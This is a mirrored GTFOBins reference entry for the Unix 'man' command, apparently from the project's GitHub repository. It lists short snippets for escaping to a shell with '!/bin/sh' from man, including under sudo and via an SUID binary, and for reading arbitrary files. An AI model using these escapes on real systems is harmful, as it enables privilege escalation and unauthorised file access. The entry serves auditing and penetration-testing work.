1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-20 02:42:45 +02:00
GTFOBins.github.io/_gtfobins/man.md
2018-05-28 20:12:44 +02:00

19 lines
275 B
Markdown

---
functions:
execute-interactive:
- code: |
man man
!/bin/sh
sudo-enabled:
- code: |
sudo man man
!/bin/sh
suid-limited:
- code: |-
./man man
!/bin/sh
file-read:
- code: |
man file_to_read
---